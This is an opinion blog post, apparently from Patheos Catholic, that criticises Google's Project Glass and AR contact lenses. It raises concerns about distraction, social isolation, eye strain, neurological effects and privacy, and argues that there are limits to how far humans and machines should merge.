Google Wants to Augment Your Reality

I’ve known this was coming for some time, but it’s actually more alarming than I expected it to be.

Google’s Project Glass is an augmented reality system based on the idea of wearable computers: in this case, a pair of glasses that compresses all the functionality of a smartphone (phone, messaging, camera, GPS, social networking, etc) into one hands-free, voice-controlled device.

Here’s the first look at it in action:

YouTube Preview Image

The prototypes appears to have a single screen positioned above the right eye, which suggests that it is possible to look away from the image:


But the New York Times is reporting that

Project Glass could hypothetically become Project Contact Lens. [Barbak] Parviz, who is also an associate professor at the University of Washington, specializes in bionanotechnology, which is the fusion of tiny technologies and biology. He most recently built a tiny contact lens that has embedded electronics and can display pixels to a person’s eye.

It looks like this:


We’ve been through many stages in the development of computer technology, and a number of the most important stages involved lowering barriers between user and device. Input has evolved from punchcard to command lines to mouse to stylus to touch, each time bringing the technology closer to the individual.

Yet one thing has remained fixed: the screen. We’ve moved it around  a bit, tarted it up with colors, shrunk it down, even started making it flexible. But the screen was always out there, at a distance. It was separate from ourselves.

I worked extensively with the early consumer “VR” headsets (I still have some around here somewhere) and found them all unsatisfactory not just for technological or ergonomic reasons, but for the way they shut out the world and isolated the user. As technology has improved, those problem of total immersion have remained a constant, and even gotten worse.

Sensory-deprivation studies on humans have revealed an effect called “faulty source monitoring”, which can occur within 15 minutes of a test subject being placed in a sensory-deprivation room or tank. This means that the brain starts to malfunction–quickly–in its ability to recognize the source of what it is perceiving. The result? Hallucinations.

That’s an incredibly fast reaction, and goes a long way to explaining why total immersion VR is acutely uncomfortable for many. Normal sensory input is being subjugated to artificial sensory input. Even really vivid 3D films and theme park rides can leave people woozy and discombobulated, and it’s not just from motion sickness. It’s from the fact that your senses are being screwed with.

The glasses for Project Glass are not total immersion. They do not deprive the senses of stimulus. In fact, they add new stimulus: the data streaming through the projected image and the earpieces. However, we’re dealing with a similar problem: the ability of the brain to process radical shifts in traditional sensory input.

The video shows a person walking around the city, doing all the usual smartphone tasks with an image floating in front of him. I get irritated when I have a floater in my eye, so I can’t imagine having Clippy or some other idiotic icon prancing around my field of vision, making this a total non-starter for me. In fact, I see a whole host of issues with this kind of tech.

First, we already have problems with people walking or driving while texting. Lifting the image from the device and placing it in front of the eye doesn’t make that better. It makes it worse. People cannot effectively split their concentration between two fields of vision, but the glasses will give them the illusion that they can. It takes intense training to get a fighter pilot to use a HUD (heads up display) correctly, but we think we’re going to strap the functional equivalent of a HUD to millions of people and just send them on their way?

Second, can you image a city full of people talking to themselves as they gaze at something no one else can see? It would be like living in a madhouse. Smartphones and personal music devices have already disconnected many people from each other. Augmented reality, particularly in a contact lens, would pretty much finish us off as a species. Further integration of people with technology means greater distance between people and their fellow humans.

Third, what exactly are we gaining from this? I can think of a few jobs that could benefit from augmented reality (things involving machinery, operating complex systems, or possibly medical applications), but very little about my everyday life that could be improved. It offers a very minor improvement in convenience (hands free and more convenient location of the image are about it) at the sacrifice of so much.

Fourth, what will it do to our brains? If symptoms of faulty source monitoring started to emerge after only 15 minutes of sensory deprivation, what kind of neurological and psychological problems will emerge with a constant data stream in your eyeball? Are they studying the way this affects the brain? Is anyone even asking the question?

Fifth, what about vision? The constant focusing, from near to far, that this must require would put a huge strain on the eye itself. Are they studying how this affects eyesight? The video shows it being used in daylight. What about nighttime use? Can it be used at night? Does that mean the screen is illuminated? If so, does it interfere with night vision?

Sixth, how much control of our senses are we giving over to third parties? If you can stop and take a picture of anything you’re looking at, doesn’t that mean someone can access your camera and simply follow you around, in a first person view, without you even knowing it? If you have a screen in your contact lens, how long before people start buying ad space on it? Who’s creating the applications you use with this technology, and what are their motivations and intentions? It’s one thing when you’re staring at a screen on your desk or something in your palm, a couple feet away from your body. But when that image is integrated with your very perception of reality, it becomes all that much more powerful. Is it really a good idea to let not just the technology, but the technologists, have that much access to your perceptions?

We are reaching the acceptable limit of convergence between man and machine. Our machines need to remain outside of us, apart from us, so that we can perceive them for what they are: tools to be set aside. They cannot be allowed to alter us at an ontological level, and the ability to manipulate basic sensory input gets perilously close to becoming an ontological problem. We are not merely what we perceive through our senses, but that is an awfully large part of our being. Using technology to create a whole new paradigm for the way we see and hear our world is fraught with all kinds of dangers, and for what reward? Being able to check in at a hot dog stand on Foursquare without touching your phone?

I’m sure mobile technology can evolve far beyond the current handset paradigm. The question is: do we want it–do we need it–to?

Like Patheos Catholic on Facebook!

Patheos Catholic LogoCLICK HERE TO "LIKE" PATHEOS CATHOLIC ON FACEBOOK

Burnt Biblical Scroll Deciphered by Digital Technology
DARPA? More Like DERPA--Watch Robots Fail
27 Years Of Microsoft Experience Summarized in One Screen
Pregnancy: A Game About Abortion
About Thomas L. McDonald

Thomas L. McDonald writes about technology, theology, history, games, and shiny things. Details of his rather uneventful life as a professional writer and magazine editor can be found in the About tab.


CLOSE | X

HIDE | X